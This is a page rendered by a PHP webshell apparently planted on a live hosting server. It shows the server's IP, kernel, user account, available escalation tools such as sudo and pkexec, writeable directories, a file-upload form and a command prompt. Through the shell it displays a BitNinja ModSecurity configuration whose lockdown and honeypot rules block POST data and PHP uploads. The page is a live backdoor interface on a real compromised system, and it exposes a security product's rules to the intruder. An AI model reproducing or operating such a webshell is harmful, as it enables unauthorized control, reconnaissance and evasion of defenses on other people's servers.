403Webshell
Server IP : 23.111.136.34  /  Your IP : 216.73.216.136
Web Server : Apache
System : Linux servidor.eurohost.com.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : meusitei ( 1072)
PHP Version : 5.6.40
Disable Function : show_source, system, shell_exec, passthru, proc_open
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/bitninja-waf/etc/BitNinja/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /opt/bitninja-waf/etc/BitNinja/400-BITNINJA-INITIALIZATION.conf
#SecAction "id:400000, phase:1,\
#  nolog,\
#  pass,\
#  t:none,\
#  setvar:tx.bn_inbound_found=0,\
#  setvar:tx.bn_outbound_found=0,\
#  setvar:tx.bn_pattern_lockdown=1,\
#  setvar:tx.bn_pattern_can_honeypotify=1,\
#  setvar:tx.bn_pattern="
SecRule TX:BN_PATTERN_LOCKDOWN "@lt 1" "phase:1, id:400010, nolog,noauditlog,pass,skipAfter:BITNINJA-LOCKDOWN"
SecRule TX:BN_PATTERN_LOCKDOWN "@lt 1" "phase:2, id:400011, nolog,noauditlog,pass,skipAfter:BITNINJA-LOCKDOWN"
SecRule &ARGS_POST "@gt 0" \
  "id:400110, \
  phase:2,\
  msg:'Requested location [%{tx.bn_pattern}] is on lockdown. No POST data allowed.',\
  logdata:'POST data not allowed.',\
  deny,\
  status:405,\
  severity:WARNING
SecRule TX:BN_PATTERN_CAN_HONEYPOTIFY "@lt 1" "phase:2, id:400013, nolog,noauditlog,pass,skipAfter:VIRTUAL-HONEYPOT"
SecRule &ARGS_POST "@gt 0" \
  "id:400112, \
  phase:2,\
  rev:'1',\
  msg:'Requested location is a virtual honeypot location. No POST data allowed.',\
  logdata:'Requested location is a virtual honeypot location. No POST data allowed.',\
  block,\
  setvar:tx.bn_inbound_found=+1,\
  severity:CRITICAL
# Many user enabled virtual honeypotification on / and made there sites unreachable.
# This is not the way this should be used.
SecRule TX:BN_PATTERN_CAN_HONEYPOTIFY "@lt 1" "phase:1, id:400012, nolog,noauditlog,pass,skipAfter:VIRTUAL-HONEYPOT"
SecRule REQUEST_BODY "(?:(?:<\?php|<\?)\s)"
  "setvar:tx.bn_inbound_found=+1,\
  id:400114, \
  phase:2,\
  rev:'1',\
  msg:'PHP file upload not allowed on this location',\
  logdata:'PHP file upload not allowed on this location',\
  block,\
  severity:CRITICAL"

SecMarker "VIRTUAL-HONEYPOT"SecRule &ARGS_GET "@gt 0" \
  "id:400113, \
  phase:2,\
  rev:'1',\
  msg:'Requested location is a virtual honeypot location. No GET data allowed.',\
  logdata:'Requested location is a virtual honeypot location. No GET data allowed.',\
  block,\
  setvar:tx.bn_inbound_found=+1,\
  severity:CRITICAL
SecRule &ARGS_POST "@gt 0" \
  "id:400111,\
  phase:1, \
  msg:'Requested location [${tx.pattern}] is on lockdown. No POST data allowed.',\
  logdata:'POST data not allowed.',\
  deny,\
  status:405,\
  severity:WARNING

SecMarker "BITNINJA-LOCKDOWN"

Youez - 2016 - github.com/yon3zu
LinuXploit